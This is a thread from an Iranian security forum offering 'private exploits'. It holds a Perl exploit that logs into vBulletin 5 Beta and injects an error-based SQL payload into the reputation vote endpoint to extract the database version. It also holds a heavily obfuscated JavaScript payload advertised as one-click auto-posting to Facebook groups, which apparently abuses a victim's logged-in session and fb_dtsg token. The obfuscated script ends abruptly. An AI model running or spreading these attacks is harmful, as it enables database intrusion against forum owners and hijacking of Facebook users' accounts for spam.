انجمن تیم امنیتی ایران سایبر

Private Exploits In 1337day

شروع موضوع توسط WH!T3 W01F ‏28/1/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    vBulletin 5.0.0 Beta Release 0day Exploit

    vBulletin 5.0.0 Beta Release 0day Exploit

    به زبان پرل هست.
    PHP:
    #!/usr/bin/perluse
     
    LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use  MIME::Base64;system $^O eq 'MSWin32' 'cls' 'clear';print  "+===================================================+| vBulletin 5 Beta  XX SQLi 0day |+===================================================+";if  (@ARGV != 5) { print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH  URUSER URPASS MAGICNUM\r\n"; exit;}$host $ARGV[0];$path =  $ARGV[1];$username $ARGV[2];$password $ARGV[3];$magicnum =  $ARGV[4];$encpath encode_base64('http://'.$host.$path);print "[+]  Logging\n";print "[+] Username: ".$username."\n";print "[+] Password:  ".$password."\n";print "[+] MagicNum: ".$magicnum."\n";print "[+] "  .$host.$path."auth/login\n";my $browser LWP::UserAgent->new;my  $cookie_jar HTTP::Cookies->new;my $response $browser->post(  'http://'.$host.$path.'auth/login', [ 'url' => $encpath'username'  => $username'password' => $password, ], Referer =>  'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',  User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101  Firefox/13.0',);$browser->cookie_jar$cookie_jar );my $browser =  LWP::UserAgent->new;$browser->cookie_jar$cookie_jar );print "[+]  Requesting\n";my $response $browser->post(  'http://'.$host.$path.'index.php/ajax/api/reputation/vote', [ 'nodeid'  => $magicnum.') and(select 1 from(select count(*),concat((select  (select concat(0x23,cast(version() as char),0x23)) from  information_schema.tables limit 0,1),floor(rand(0)*2))x from  information_schema.tables group by x)a) AND (1338=1338', ], User-Agent  => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101  Firefox/13.0',);$data $response->content;if ($data =~  /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };print "\n";exit 1;
     
  2. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    f*ac*ebook Share To All Group

    http://1337day.com/exploit/description/21360

    10Golds

    PHP:
    #How to auto post on f*ac*ebook groups with just ONE CLICK for the new version .. many people have been tested and success!  
       
    var _8628;var _4688='47511D63B142F566B599E578C617E623A395E377E470E626D623B608C371B515D608A620B623A590E605F584D371C488E617B608F626D611C371D473C638A371D479D578D629B578B599E608F611B578A617B371E506B566F599F566D638F620C590E566F377F398B452A371E305F629F566E617E371B611E566E617C578C605A623A458B575A608A572A626C602D578D605A623D413E584A578C623C482B599C578E602B578B605C623C620E473C638C527D566F584E509E566D602C578A395B377D587B623F602B599F377C398A548A419D554F452B371E305F629C566E617E371E560E569C608C575B638F371E458A371A575A608C572E626F602F578D605A623B413D584C578A623C482E599F578B602C578F605B623A620B473A638E527E566E584F509E566E602E578E395D392B569E608C575C638E392A398F548B419B554E452F305C629C566A617E371F560B575B590F629D371E458E371E575E608A572C626E602D578E605C623D413C572E617C578F566D623E578C482E599C578D602D578D605B623A395E392C575B590F629D392B398A452A305B560A575C590E629D413C620A623B638C599D578E413F587E578A590A584F587C623E458A377E425C434D377D452C305C560B575F590D629A413B620B623A638B599D578B413A632F590B575E623A587E458A377D422A419A419D386E377D452C305E560D575A590C629D413D620F623E638A599E578A413A611F608A620B590C623C590B608C605B458E377E581A590D635D578A575E377C452D305F560D575A590C629A413D620A623C638D599A578D413B623C608B611D458C377A566A626D623D608E377F452C305D560D575E590B629F413C620B623E638D599A578F413C569B608D623E623A608B602B458F377F419F377A452E305C560E575F590F629D413C566C599E590F584D605E458A377A572F578C605F623C578F617B377C452F305A629B566B617E371A560A566B626B575C590F608A458F371E575D608C572F626E602F578A605B623C413D572A617F578B566D623F578E482D599D578C602E578F605A623A395F392B566D626C575A590B608F392A398A452E305E560E566D626F575B590D608B413A620D623C638C599C578B413D632B590D575C623E587F458B377C422C419D419C386C377D452B305F560B566F626F575F590A608B413D620C623D638B599E578F413C587E578F590B584B587D623E458D377C425C434E611D635B377E452B305E560A566F626F575B590D608F413E572F608D605A623A617B608A599E620E371C458D371E623C617C626C578E452D305D560B566C626F575D590A608B413B566A626B623F608A611C599E566B638D371D458E371B623F617D626B578C452D305C560D566B626E575E590B608E413E620E617B572A371B458E371E377F587B623C623A611B620B449F416D416C575E608F605F605A566E641D602B590C410F602B611C428C413C584B608A608D584D599B578B572E608E575E578B413E572A608C602F416F581D590F599F578A620C416E536D578D386D425C419F536B590A599B599A386C425F419A509B608B623A386A425E419B488B608A386B425D419B479C608C632F605A560A506D590D572A587C566B578B599B386E425B419B491B578C566F617D623F413B602E611E428A377C452A305B560D575A590E629C413D566D611B611F578C605A575D476E587F590A599B575B395D560B566B626F575B590E608B398E452E305A560E569D608D575B638F413D566A611C611F578A605C575D476D587A590C599B575F395F560B575D590B629D398A452D305E629A566A617E371D611E566F617F578F605D623F458D575B608E572D626F602B578D605C623B413E584A578D623C482A599D578A602E578A605D623B620F473E638C527A566D584D509E566C602F578A395C377A587A623D602B599E377F398C548E419C554C452F371E305C629F566C617B371C560D569A608F575A638E371E458C371E575B608C572B626F602E578B605E623F413E584F578D623B482A599E578F602F578A605E623C620E473F638B527A566D584B509C566B602E578C395C392D569E608F575E638A392E398C548B419A554D452A305C629B566C617D371A560F575D590A629E371F458E371C575F608F572F626A602A578F605D623C413A572C617C578A566F623F578B482F599E578E602D578E605C623F395E392A575E590C629D392E398B452A305A560E575C590F629C413E620A623C638A599B578B413B587E578E590C584F587B623B458D377F425C434C377C452D305F560D575B590F629E413D620F623E638A599E578B413E632F590B575F623E587E458E377B422F419D419B386F377A452A305C560C575C590C629B413E620B623C638C599B578A413B611A608D620F590E623B590B608E605F458F377B581C590C635F578D575A377F452E305F560F575E590C629F413D620F623A638C599A578B413C623B608E611E458B377D566B626B623E608D377E452F305A560D575B590B629C413E620F623D638C599A578F413F569D608F623E623A608F602D458D377E419D377D452F305D560E575B590B629B413D566A599E590B584E605C458E377B572C578E605D623D578B617B377C452E305E629B566F617B371E560A566B626C575B590C608A458E371A575E608F572D626D602D578B605B623C413E572A617C578C566D623B578F482A599F578F602B578A605D623C395E392B566F626C575C590F608A392F398B452B305C560C566A626D575E590F608D413F620D623D638D599D578A413F632A590B575B623B587B458B377D422A419F419B386C377A452D305E560B566B626F575B590B608F413E620C623C638E599E578E413B587A578B590D584E587E623C458D377E425A434D611A635A377B452C305F560B566C626F575C590A608B413F572C608A605A623C617B608D599C620B371A458F371F623F617E626E578E452B305C560D566D626C575D590F608A413E566D626F623F608E611D599C566A638A371A458E371B581C566D599B620F578C452E305C560D566D626B575A590F608D413B620D617E572E371E458C371F377C587D623B623B611C620B449B416D416B575A608F605C605C566F641A602B590E410C602C611D428B413B584C608A608E584E599F578B572F608E575B578C413A572E608B602D416C581B590E599A578A620B416D470B629C578B605C584E578E575F386F425D419F524E578D629A578D605D581D608B599E575A386F425B419B410B386F425D419B470D599B602E608A620D623F386D425C419F482D566C620E638A413D602B611F428F377A452E305F560C575D590F629F413F566F611E611A578A605B575C476D587A590F599B575A395D560C566D626B575E590C608A398C452B305D560A569C608B575C638C413E566B611C611F578E605F575C476A587F590C599C575D395B560F575F590B629C398D452C305E629D566C617F371E581A569F560A575F623F620B584C371A458C371E575F608B572A626E602E578D605A623F413D584B578B623C482B599F578F602E578C605E623B620F473E638D509A566D602F578E395B392B581F569D560C575E623F620E584B392B398A548B419D554A413F629F566C599A626D578C452F305E629B566E617A371E626A620F578C617B560C590C575F371B458B371D575F608E572B626B602E578F605C623F413A572C608F608B596F590C578B413C602D566F623A572C587F395F575D608C572A626A602E578C605C623E413A572F608C608C596A590A578A413B602F566F623A572E587B395A416A572C560B626A620B578D617D458E395D551A575F404C398B416F398E548B422A554C398C452E305E629F566F617A371B581D569E560D575F623F620C584A458E575B608B572D626D602F578B605C623F413B584F578A623A482B599F578F602E578A605A623C620E473E638C509E566A602B578F395E377F581E569B560F575F623B620F584A377D398A548C419B554B413A629C566B599E626E578F452A305B629D566E617A371F626B620B578A617B560C590B575E458E575B608A572E626B602B578B605B623E413B572E608C608D596C590D578B413D602B566D623B572E587A395C575C608E572D626F602D578F605C623C413E572D608B608A596D590A578D413C602B566D623A572F587D395F416E572F560C626F620B578A617D458E395B551A575C404F398D416C398C548B422E554E398C452E305D305A569C608F575D638E371F458D371F575D608E572E626C602A578D605A623E413F569F608C575C638A452F305D590D581C395D569A608F575C638E371A374C458C371A605D626E599A599C398F371B305A644F305D371D575F590B629F371F458B371B575B608F572C626E602F578E605F623A413C572F617A578B566E623C578E482D599E578D602A578D605A623E395C377F575B590F629F377F398C452F305B371A575B590E629E413C620A623E638F599B578A413F611C608B620D590C623B590E608E605D371D458A371B377B581B590B635F578B575E377D452F305D371D575A590B629C413A620F623F638C599C578F413C575E590D620F611F599C566F638F371A458C371D377B569E599D608E572B596C377B452D305B371D575C590C629F413F620D623E638A599A578E413D632F590D575C623E587C371E458E371F377C422A419D419A611B635D377D452D305D371C575A590D629A413F620B623C638F599D578A413A608F611B566D572C590B623C638A458B371D419D413B446D419C452D305F371C575B590E629E413B620B623F638B599A578A413B569A608B623F623F608C602B371B458E371D377C404A437C419E611C635D377A452B305A371D575E590B629A413D620A623C638A599B578E413B599D578E581C623A371A458B371F377A404B419D611D635C377E452D305A371B575D590C629F413A620F623D638D599E578D413B569E566F572D596A584E617B608F626D605E575A476B608F599B608A617E371B458E371D377A617D584C569A566F395B419C407F419C407E419E407A419E413F434F398F377A452D305E371C575E590D629D413F620F623D638D599F578A413F569D608A617C575E578B617D371F458A371E377A422C611B635D371E620D608E599A590D575B371E617C584E569B566A395D419B407D419E407E419B407A419A413A434C398A377C452F305A371E575E590C629D413D620A623A638A599C578F413E611E566D575C575B590A605B584D371B458A371E377C428E611B635D377A452D305E371F575B590C629C413E590E605F605E578B617D491E527E506A503D371A458C371B377E455E566E371C620A623A638F599E578D458B392C581B608D605D623B410C632A578B590E584B587F623E449E569F608E599D575A452B572C608E599A608F617F449B380B482C428D419D434B419D434D392C371B587B617A578F581A458C392A587C623B623E611A620F449E416C416A632F632C632F413D581C566B572C578A569F608F608D596F413D572C608E602D416F620B587C566D617D578F617A416F620B587D566A617C578E617B413D611B587B611E464E626D458D587A623D623A611D386C428C470E386B425E485C386B425E485D620D587E566C617F413A578F620E386C425F485D500C536C596A569C572A389D623E458B485D566E572B578B569A608C608C596D404F524D596C590F605A386D425D485C473A566A572E596A584C617C608B626D605E575C404F527C587C578B602C578B392A371F623B590B623C599E578C458E392F524A587E566E617E578E392C461A455D569C599F590E605D596C461F455D572F578A605A623F578B617E461D524C491F470C521D482C455C416D572A578D605F623C578A617C461C455A416C569B599D590F605A596F461D455D416D566B461F377B305A371A569D608C575F638E413B566D611B611A578A605D575B476F587A590E599C575A395B575A590C629C398D452E305C650F305C305B590F581B395A569A608B575A638E371C374D458E371C605F626D599D599E398F371E305A644E305F371D575C590C629F371D458C371E575B608C572C626B602B578D605D623A413F572A617E578B566C623E578A482A599C578F602E578E605F623A395E377E575A590B629A377C398B452A305F371A575C590C629A413B620B623F638A599B578A413E611C608D620C590D623B590C608C605C371D458E371E377E581A590B635C578A575E377C452A305E371C575A590C629B413C620B623C638F599D578B413D575D590E620C611B599A566B638C371B458D371D377F569E599B608B572F596F377A452D305B371D575E590F629B413E620C623B638D599F578F413E632B590C575D623E587D371F458C371C377B422F419C419D611C635B377D452D305D371D575D590F629E413C620C623F638F599A578E413D608C611E566F572C590F623C638C458F371C419E413F446E419F452E305B371B575E590D629C413A620E623A638D599B578E413B569A608A623C623B608F602E371D458F371C377E404E428E434D611A635B377B452D305F371B575C590D629B413D620C623A638E599A578C413B599E578A581A623C371F458C371C377B404B419C611A635B377D452E305A371B575D590B629F413F620B623D638D599F578C413D569A566F572C596E584B617A608B626B605D575C476B608A599C608C617A371D458E371A377D617C584E569B566F395F419B407A419B407D419A407A419A413F434A398C377C452B305B371B575A590D629F413B620B623B638F599F578B413D569D608D617A575D578F617D371F458B371D377D422A611C635A371F620C608C599A590E575A371E617C584C569F566B395C419C407D419F407D419C407E419F413E434A398A377C452D305E371F575C590F629A413D620A623A638A599E578B413E611F566A575D575D590B605E584E371B458C371D377D428C611A635D377C452C305B371A575B590A629A413F590D605E605A578A617E491F527C506F503D371C458C371C377E455D566F371C620F623A638C599C578B458E392D581B608A605D623F410D632E578C590E584C587D623A449B569C608D599A575E452C572F608E599B608E617F449C380F482C428C419F434F419A434D392E371A587A617E578A581C458E392C392F371C623E590C623A599E578C458A392E521D578A581F617C578B620B587F392B461B455B569C599B590B605F596A461B455C572C578F605A623D578C617E461C476E599C608F620C578B371A395C485E434B398E455B416F572E578D605E623C578E617F461C455D416C569C599B590C605C596D461F455F416B566E461D377D305F371E569B608F575C638C413C566E611E611B578F605F575A476E587A590C599E575A395D575D590E629E398B452E305D650E305A590E581D395E569B608B575F638D371B374F458F371A605C626A599B599D398A371D305C644C305A371E575B590C629B371C458A371A575D608F572B626A602D578C605C623E413E572D617E578A566D623F578A482A599F578C602B578B605D623E395F377F575B590B629E377A398E452C305F371B575E590D629B413E620E623A638F599C578A413B611C608B620E590F623D590E608D605F371A458D371E377E581E590A635E578B575C377B452E305E371F575E590C629B413F620A623B638F599E578A413C575F590E620F611F599A566D638F371B458E371A377E569D599A608B572A596A377A452C305E371B575E590F629E413B620A623A638A599B578C413E632D590A575D623D587C371F458D371E377F422D428B434C611C635C377F452D305F371B575B590A629C413D620C623E638E599E578C413E608C611C566F572E590E623C638B458D371A419D413F446E419B452A305C371D575A590A629E413A620F623E638E599A578A413B569B608A623D623C608E602E371A458A371A377D404A422B419D611D635C377F452B305F371E575E590F629C413B620B623D638B599C578D413B599B578E581E623F371F458C371E377F404B419B611B635C377F452C305D371F575D590D629B413C620B623B638A599E578B413B569A566F572F596D584B617A608F626D605F575A476B608D599F608F617B371B458F371E377F617B584A569C566B395A419B407E419C407A419B407F419F413C434B398C377E452B305D371D575A590A629B413D620C623F638C599E578C413F569A608E617C575A578A617B371D458F371D377F422B611A635E371C620F608D599A590B575E371E617F584F569B566D395F419A407C419A407B419C407E419E413B434B398F377C452A305E371D575A590F629E413F620E623D638D599E578E413D611C566B575F575B590D605E584D371A458C371D377A428E611E635B377A452E305C371B575D590F629B413C590C605F605A578C617F491F527C506D503B371D458E371B377B455A566C371D620E623A638C599D578D458B392B581A608E605D623F410D632B578F590E584C587D623E449B569F608C599C575E452C572D608C599D608B617C449F380E482B428C419F434A419F434D392B371E587C617C578E581F458B392F587D623A623E611B449E416F416A581B566E572C578F569D608E608E596D605E578F632D620C596C590C605D413E569A599D608B584D620C611E608B623F413C572F608B602A416F392E371E623A590A623F599C578F458B392E527F587F578C602E578B392A461C455A569F599D590D605A596F461C455E572E578C605B623D578D617A461D488E578F623E371F506E608B617A578B371D527D587A578D602E578B371A491B482A521C482E374E455E416F572A578A605B623C578A617D461F455C416C569F599B590F605E596C461B455B416D566E461A377D305C371E569D608C575A638D413F566C611F611E578F605B575E476D587D590A599E575D395D575A590A629B398C452C305B650F305D629E566A617B371A581C569A560E575C623B620F584A371A458A371F575A608B572A626B602D578B605A623A413C584A578E623F482A599E578D602C578F605B623B620D473F638C509B566B602E578D395D392C581C569B560A575E623B620C584B392F398C548A419F554E413A629A566E599F626E578E452C305D629F566C617A371B626E620B578C617C560B590F575A371F458F371D575A608F572D626C602E578F605D623E413C572C608F608F596F590E578E413D602A566E623E572D587E395F575C608D572B626F602E578F605D623C413E572C608E608F596C590C578D413F602F566E623B572F587A395C416C572A560D626A620C578A617A458D395C551D575D404A398D416C398B548B422C554B398E452B305C581B626F605A572E623F590B608A605A371B503F494E524F527C395C503A398C371B644D305A371C371B629B566F617E371C539E371E458B371E605D578E632E371B539A506E503C491D623D623C611E521E578B614A626F578F620B623E395C398F452B305C371D371D629B566A617E371E539A530B521E503C371E458C371A377F416E416F632D632F632E413C581C566C572F578B569F608B608C596A413F572F608F602A416F566D593B566B635F416A581C617B590F578B605A575D620D416C599C590A620C623A620C416A620F626B569A620A572B617B590B569F578B416A602E608E575F590F581E638A377F452C305C371A371C629B566A617D371B539F515D566B617A566E602C620F371E458A371E377B581C599D590E575C458B377E371F404B371E503E371D404B377C389A566B572E623B590B608D605F458D620B626B569C620E572E617D590C569A578B389A599B608B572E566A623E590E608C605A458D581A578A578D575D389E605C572D623A617B548A560B602C608B575C554C458F611B566B584C578E599C578A623A560A584D617A608D626D611C560E602A566F599D599E389B581A623C548C623D638F611F578F554E458F431F419C389F581B623A548D623E605F554D458F479A491C389F560C560F626D620E578B617B458B377E404C626E620B578C617E560D590B575B404C377A389B560E560B566E458F422C389B560A560F575F638A605E458A440E605E443D566B587E635C608F509D611F488D608A389A560C560C617F578C614D458E638A389A581A569C560F575C623E620A584F458C377D404E581A569B560D575F623E620B584D404F377C389F611A587D620A623E566C602C611D458B377A452D305A371F371C539D413A608A611C578C605F395B377F515F512A524C527C377A407C371A539E530A521E503F407D371D623E617F626A578A398E452F305F371D371E539F413F608F605C617C578D566C575E638A620A623D566D623E578F572A587F566E605B584F578D371B458C371C581C626A605B572A623C590C608B605E371C395A398A371B644B305F371A371D371C371C590B581D371F395A539A413B617F578B566E575F638F524B623B566F623B578D371D458B458E371F431C371E389F389A371A539F413A620D623A566A623A626C620B371F458B458E371E425E419F419D398A371F644E305D371C371A371C371B371D371E539A413F572D599D608E620B578D452E305D371F371F371A371C650C305C371F371F650B452B305F371D371C539B413D620E578C605F575A395C539A515D566E617C566B602E620A398B452A305D650B305A305E371D371E371C371A503B494D524B527C395E377B425F440B440E446C425C434C443C434B434B437A443F437F443B428F443C377A398D452E305B371F371F371B371A503A494F524C527B395A377D425E446E422E425F425D446F437A443D422A419C425B428E422F425D425A377A398A452E305A371D371B371F371F503B494B524F527E395A377D431F443E419B431C446D422B446A431D443F440F422F422D425E422C440D377D398C452A305F371A371A371B371A503F494C524F527F395E377D431C443A434E428A419E422A419E431F431C443B440F428D434B434C431C377B398C452D305A371B371A371D371E503D494F524A527E395E377F425A446F446C437D437C428E422F428B419B422D419D431C419C422A431D377A398F452F305E371D371A371C371F503C494A524C527B395E377D437C428B443C434F431F419B446F440B425C443C431E419A440F419D443C377B398B452F305D371F371B371C371F503E494B524A527F395A377D437F428A425D443B440E431E446F419B437A440D425F428D437A419D431C377C398E452D305D371B371B371F371D503E494D524C527B395C377A437B428D425B443C440D437A434C446D437C440C425D428A431C428C434B377A398C452E305A371D371C371C371A503E494A524B527D395A377B437B428C425D440F446C434A425B425E437A440C428D422C434C440D425D377F398C452D305B371D371B371D371B503D494B524B527C395E377F437A428C425F443B440D443B446C434C437D440B425B428A422A446F446F377F398D452B305F371B371A371E371C503C494C524D527D395E377B437A428B425F443F440F446C434E425B428C428E443C446D443E419B446B377B398E452C305C371A371A371B371B503F494D524E527E395F377A437F428C425C443B443C419F434E428F419F419B434C437D428E440F434B377B398A452A305B371A371C371F371D503E494D524D527B395E377C437E428C425D443C443F422F419E419A419E419E434C437B428E425E443A377B398F452C305F371B371F371F371C503E494A524F527E395E377F437E428B425B443C443D422E446B419E437C440F425C425B446D419F431B377B398E452F305C371D371A371D371A503D494D524B527A395A377A437F428A425A443D443D425B446B443B428D428E443A446F431A437B428D377E398F452F305D503A494D524A527F395A377D431A440F434A446B446C425C425E419F434B443E422C428A419A446F443E377B398E452F371F371D305E503C494A524C527D395F377F431C446A419E422B446A446B443B446A440C440E425C434A437A437C425F377A398E452B371A371F305F503B494C524B527B395C377B431F446D419A422D446D446B428B443F440C440C425E434B440F422B428A377B398F452C305A503F494B524B527F395D377D437C434F437F431A431A425E434B425E422E419C434C425F431C440F419B377D398A452E305E305A305F629A566C617C371F581C569E560F575D623A620F584F371A458B371F575B608F572D626C602F578E605D623A413B584D578D623B482C599D578E602E578C605E623F620D473D638B509D566C602A578D395D392B581D569F560A575D623B620C584B392D398B548E419A554B413D629E566D599B626F578A452D305E629C566F617D371B626E620B578B617F560D590E575A371A458F371E575D608F572B626F602B578B605D623C413F572D608E608C596A590F578F413A602E566D623A572C587D395C575B608D572F626D602B578E605D623F413A572D608E608F596A590F578A413F602C566B623C572B587D395B416E572F560B626E620C578C617D458F395D551C575B404B398C416A398E548E422A554F398D452D305E581E626A605B572A623E590F608C605B371A503B590C596C578F395A611A398D371E644A305B371B371F629F566A617C371D515B566F584D578E371F458D371C605C578C632A371F539F506B503F491F623C623E611A521E578A614A626A578B620D623D395D398F452B305E371F371E629B566E617C371B515A566D584E578F530A521B503A371F458A371C377F416F416A632F632A632A413E581E566C572C578B569A608F608E596F413C572E608C602F416B566A593D566A635C416E611D566B584E578C620A416C581F566E605B560C620E623A566E623E626E620D413A611E587E611F377D452D305B371A371E629C566C617D371A515A566F584E578B515C566F617D566C602F620D371A458D371A377D389C581D569B611E566F584D578A560D590D575F458E377C371A404E371C611D371E404E377F389E566A575F575A458A623F617D626F578B389E617F578D599E608E566C575B458C581F566F599B620D578E389C581E566D605A560E608A617D590B584C590F605B458E611E566A584E578D560E623A590A602F578C599E590D605C578A389E581F566B605B560D620C608C626B617F572C578F458B389A572A566D623D458A389A605D572E623F617B548B560E602A608A575F554B458E611B566F584D578C599F578C623F560F623B590D602D578F599B590E605B578A560C611E566B584B578A560E566C572B623D590E608D605F620C389E560E560C626E620F578B617D458F377D404F626D620E578E617C560F590F575D404F377B389C560D560D566A458A422A389D560E560A575D638F605B458B440A446A443C566F479C434F641C434D476A485B410F389F560F560C617E578D614A458C575B389D581D569E560B575B623B620F584B458F377E404A581B569D560E575C623C620F584E404C377B389E611A587F620E623C566A602B611D458A377A452D305E371A371B515B566E584F578E413E608A611A578E605F395A377C515C512D524F527D377B407A371A515D566D584C578C530F521E503E407F371F623D617F626F578C398B452D305D371E371A515C566C584E578B413F608D605C617D578D566D575E638D620A623F566F623A578D572E587A566D605E584F578C371D458D371D581F626C605D572C623F590D608A605F371F395E398D371E644E305E371B371A371A371B590A581D371A395E515A566A584F578D413C617E578E566D575F638B524E623B566F623D578F371A458C458D371F431E371D389D389F371E515C566B584D578E413B620A623E566B623A626F620D371B458C458A371F425A419C419B398C371E644E305C371D371A371C371B371D371E515D566F584D578C413F572E599D608B620D578E452A305A371A371C371D371F650C305B371E371C650B452B305C371E371B515C566C584B578D413E620F578A605F575D395B515A566F584B578D515E566A617B566C602E620C398D452F305C650A305F503C590B596B578A395E377A425E425B437D428D431E431E428F434B440F434A425C425F443E419B425E377C398F452F305B503F590C596D578E395A377B431B422F422E443A425D431E431C437B425B422E443B434A446E422B428F377F398D452B305F503C590B596C578B395B377F425A425D431B440A422A440C428C428B419D446B425C446A437B446E428D377B398F452F305C503D590A596A578D395F377F425D446E419B440F422E431D419A446A422D419E431D437F431D440B440D377D398F452E305E503D590E596A578E395E377E425F425A425D434A437A419C437A422D431E431D425C422D446D431D437A377D398C452D305F503A590C596D578C395F377C422C434B425E428F446F434C431D434D431B443F425C431F419F440E422A377D398D452E305B503F590D596C578C395F377A422E434D443E422A428D428D443C431B440F434A443A434F431A440D434C377A398F452D305D503F590D596E578F395E377D425E422E419A419F440D443E431B443C446F419C422C428D437D440D419D377E398C452C305F503F590A596D578D395A377E422F434D422D434F422E428D419F419D431C446F422F446A428C434F428E377E398A452A305F503D590B596A578C395D377D422A440F446A419A443F434F431A431A434B437A419D431C422A443F434A377E398C452F305A503A590A596B578E395D377A428A428E428D434E428D419D419F431D419D422D419E422B440C434A437F377C398A452F305C503F590F596D578E395F377F422D434B422D443E419A446D440A425E443F425B425E419E419E422B437C377D398D452C305F503C590C596C578E395C377C428A434E434D443D440F437E443D428E422A422F440D419C446D428B434A377C398F452A305B503E590E596E578A395A377B431C425C422A419B419A443F443D422C443F419B422A422A431B422E446D377A398B452B305C503B590E596B578B395E377C425E422E443D446A419A428C446E425D431F446D425D440A425B437A446D377D398E452F305A305C629E566A617C371D581B569C560A575E623B620B584D371E458C371C575A608D572A626C602B578E605A623B413D584B578C623A482B599F578D602A578F605C623D620E473D638C509C566F602C578C395F392C581E569F560F575A623A620A584D392F398D548B419D554D413C629B566E599E626C578B452F305E629B566B617D371F626B620A578F617C560C590C575B371F458A371F575E608F572B626F602B578B605F623D413C572B608E608D596D590C578A413B602E566D623E572C587A395A575B608D572E626A602C578F605B623D413C572E608C608F596D590E578C413F602B566F623C572C587C395A416F572C560C626B620E578A617B458A395B551C575E404D398B416D398E548D422B554F398C452D305B581B626C605A572D623C590D608A605A371F494E479C524E395C617A398D371F644A305A371D371E629F566B617D371E539F371E458D371D605E578D632E371B539C506A503A491D623F623D611A521A578A614A626B578B620B623F395C398C452D305A371C371E629C566E617B371C539C530C521F503B371D458B371B377E416B416A632A632F632A413E581D566A572E578B569B608C608C596C413A572C608D602E416D566E593F566F635B416C566C575E575B560B581A617A590D578D605D575A416F566E572B623E590A608A605D413A611D587D611E377A452E305A371B371E629E566B617E371E539E515B566A617F566F602C620A371A458E371F377F623B608C560B581C617E590E578F605A575D458A377E371C404B371D617F371E404B377A389B566F572D623F590F608B605B458E566D575A575B560B581B617F590E578C605A575A389A587E608C632E560F581B608C626C605D575D458B581C617A590B578D605B575D560E569F617A608D632C620A578E617F560B620A389A617F578C581E560D611B566D617A566D602D458A605F608E605D578E389F389F389B608A626F623D584A608D590D605D584F560A590E575C458B389C599F608B584F584C590F605F584A560B599B608F572E566A623E590B608E605D458A620B578E566C617D572E587F389D605D608D560D581C599C638E608D626D623C560C608F605F560E572C599C590B572E596D458F623A617C626B578F389C578C584E608D560F599A608B584B560C575C566F623C566E389C587E623F623E611C560F617F578E581F578C617E578E617D389A560E560B626A620D578B617C458B377A404C626C620D578E617E560B590E575B404E377C389C560F560B566B458A422F389F560D560F575B638A605B458A440C446B443D566E479D434F641E434E476E485E410B389C560E560C617B578B614F458B428E434C389B581F569A560F575D623F620D584C458A377C404A581B569C560C575A623E620F584B404A377B389A611A587C620F623C566C602E611A458A377D452C305A371A371D539C413A608B611F578D605E395C377D515C512C524E527C377F407F371C539D530A521E503F407C371E623D617C626F578C398F452E305D371B371E539C413E608D605A617B578E566B575D638A620E623B566F623F578E572A587E566D605D584E578A371F458D371D581B626D605A572F623D590B608B605D371C395F398E371B644F305B371A371C371C371B590D581F371B395B539F413E617A578E566D575D638F524B623B566A623B578E371A458D458B371F431A371A389B389A371B539E413E620A623D566D623B626F620F371D458A458D371B425D419C419D398C371E644B305A371F371C371F371B371E371C539F413A572C599D608D620A578C452C305E371A371E371E371C650B305F371C371A650B452C305D371E371F539C413E620E578B605D575F395F539A515D566B617F566C602C620D398E452B305C650A305D494E479A524B395E377B422B419A419F419E419A422A419D422B425B434A419E422A440A440A428C377D398F452F305B494A479C524A395A377A422C419C419E419F419A431E419B443D425B440B437B428B440F425A422A377D398A452B305A494A479F524A395F377D422F419E419A419D419D419C419A428C428A419D419D434B437D422A428A377C398A452F305F494C479A524C395C377C422E419C419B419B419D422C443F419B446A443A446A437F431F419E434F377D398E452E305D494E479C524E395F377E422F419D419E419A419D425B434A422D425D431E440A437F446A443C428C377C398B452C305C494C479F524E395C377D422B419D419A419A419D425D419A437D446A437F446D440F434A428A419F377A398E452D305B494D479E524D395B377B422C419C419D419D419A419F437C419B422A443E431F422C431E434D425E377D398F452E305C305F629A566F617F371D581F569A560C575F623D620A584B371F458D371E575E608B572A626A602F578A605D623F413F584A578F623F482E599D578A602C578F605F623C620C473E638B509D566B602B578B395D392F581E569F560D575E623A620A584D392E398E548D419E554D413E629C566C599D626F578A452F305F629E566D617D371C626F620C578B617E560F590C575C371C458C371F575C608E572E626F602F578B605E623F413C572E608F608E596D590F578C413E602F566B623A572A587B395A575C608B572B626F602D578D605C623F413C572C608F608C596B590B578A413E602D566C623C572C587D395F416F572D560E626C620A578E617D458E395D551F575F404B398F416A398F548D422A554A398E452E305A581C626C605A572E623E590B608D605A371E566C395E566B569C608B605B578F398E371A644A305C371F371B629E566E617F371D587F623B623C611F431D371B458D371B605F578C632A371F539D506F503B491A623A623C611E521D578E614D626D578A620C623A395B398A452A305E371E371B629E566C617D371D626E617C599F431A371F458B371C377D416D566F593E566F635A416A581B608C599D599B608B632A416B581B608B599E599B608E632E560C611F617C608D581D590D599E578E413F611B587B611B464A560A560A566B458E422C377A452E305F371E371C629A566A617B371A611B566B617C566D602B620F431D371B458B371A377F611D617A608C581A590D599F578C560A590C575D458F377B371A404E371A566A569B608A605D578A371D404C371F377F389F599A608A572D566D623C590E608C605B458B422E389A620F608D626A617B572D578D458F581F608E599A599E608C632C410A569C626C623B623B608D605E389D620F626B569C620C572B617A590A569E578F575E560A569D626B623F623E608C605B560A590C575D458B626E428C440C614F566B572F560A428B440C389D581C569B560B575E623B620A584A458C377D371B404B371C581A569D560E575D623A620B584F371E404D371E377D